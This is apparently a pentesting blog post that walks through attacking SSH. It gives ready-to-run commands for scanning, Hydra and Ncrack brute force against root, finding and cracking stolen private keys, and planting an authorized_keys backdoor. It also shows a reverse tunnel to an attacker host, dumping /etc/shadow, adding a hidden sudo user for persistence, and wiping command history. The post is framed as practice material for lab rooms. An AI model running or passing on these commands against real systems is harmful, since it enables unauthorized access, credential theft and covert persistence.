Leave a Comment / Exploit-Services, Uncategorized / By

Own the Shell: A Pentester’s Guide to Exploiting SSH

SSH (Secure Shell) is a staple for remote administration in Linux and *nix systems—but for pentesters, it’s a door that can be kicked in, picked open, or snuck through with the right tools and intel. In this post, we’ll go through how to identify, enumerate, and exploit SSH like a surgical intruder.

1. What is SSH?

SSH (Secure Shell) is a protocol for securely accessing remote machines over an encrypted connection. It uses asymmetric key pairs or password authentication and allows for command execution, file transfers (via SCP/SFTP), and tunneling.

Key Details:

  • Default Port: 22 (TCP)
  • Authentication: Password, public/private key, keyboard-interactive
  • Encryption: Strong—unless you find the key or credentials

⚠ Common Vulnerabilities:

  • Weak passwords
  • Default credentials
  • Reused private keys
  • Misconfigured access (root login, SSH with no password)
  • Known backdoored SSH servers (rare, but fun)

2. Scanning for SSH

Nmap

nmap -p22 -sV <target>

To detect SSH and its version (OpenSSH, Dropbear, etc.).

Nmap Scripting

nmap -p22 --script ssh-hostkey,ssh-auth-methods,ssh2-enum-algos <target>
  • ssh-hostkey: Retrieves public host key for fingerprinting
  • ssh-auth-methods: Lists supported auth types (password, public key, etc.)
  • ssh2-enum-algos: Lists supported encryption algorithms

3. SSH Enumeration

Once confirmed, move to deeper analysis.

Banner Grabbing

nc <target> 22

or:

ssh <target>

Often reveals the SSH version (e.g., OpenSSH 7.2p2 Ubuntu 4ubuntu2.10).

Bruteforce or Cred Stuffing (Hydra / Ncrack)

hydra -l root -P rockyou.txt ssh://<target>

Or:

ncrack -p 22 -U users.txt -P passwords.txt <target>

crackmapexec

If you suspect reused credentials:

cme ssh <target> -u <user> -p <password>

Check for Private Keys

If you get shell access somewhere else, hunt for private SSH keys:

find / -name id_rsa 2>/dev/null

Or user-specific:

cat ~/.ssh/id_rsa

Try reused keys across systems.

4. Exploitation Techniques

Here’s how to get in—or abuse SSH once you’re in.

Default or Weak Passwords

Still common in CTFs and legacy systems:

ssh root@<target>

Try common combos like root:toor, admin:admin, ubuntu:ubuntu.

Stolen or Leaked SSH Keys

If you find a private key (e.g., id_rsa), change permissions and connect:

chmod 600 id_rsa
ssh -i id_rsa user@<target>

If it’s encrypted:

ssh2john id_rsa > hash.txt
john hash.txt --wordlist=rockyou.txt

Authorized Keys Backdoor

If you have limited access to the system, backdoor it:

echo <your_pub_key> >> ~/.ssh/authorized_keys

Now log in freely with:

ssh -i mykey user@<target>

Port Forwarding / Tunneling

Pivot access through SSH:

ssh -L 8080:localhost:80 user@target

Now browse localhost:8080 to access internal services.

Reverse SSH Shell

Useful for persistence from victim to attacker:

ssh -R 2222:localhost:22 attacker@your_ip

Attacker listens:

ssh user@localhost -p 2222

5. Post-Exploitation

If you get SSH access, you usually have full control of a user (and potentially root).

Privilege Escalation

  • Check for sudo access: sudo -l
  • Look for SUID binaries, writable scripts, or misconfigurations

Loot the Box

  • Dump /etc/shadow, creds, tokens, or configs
  • Search .bash_history, .ssh/config, .env files

Persistence

  • Create new keys and add them to ~/.ssh/authorized_keys
  • Create a new user and add them to sudoers: useradd pentester -m -s /bin/bash echo 'pentester:pass123' | chpasswd usermod -aG sudo pentester

Clean Up

  • Remove added keys or users if necessary
  • Wipe command history: history -c && history -w

TryHackMe Rooms to Practice SSH

  • Simple CTF – Classic SSH key and privilege escalation.
  • Overpass – Custom SSH key generation and abuse.
  • Skynet – SSH login through reused creds.
  • WgelCTF – SSH enumeration + password cracking.

Wrap-Up

SSH is often seen as secure—and it is—but when creds leak, keys are reused, or defaults are left in place, it becomes a clean and quiet way to own a system. Combine strong enumeration with password reuse hunting, and SSH can be your stealthiest entry point.

If you get keys, dump them. If you get access, maintain it. SSH is your quiet backdoor into the target’s soul.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top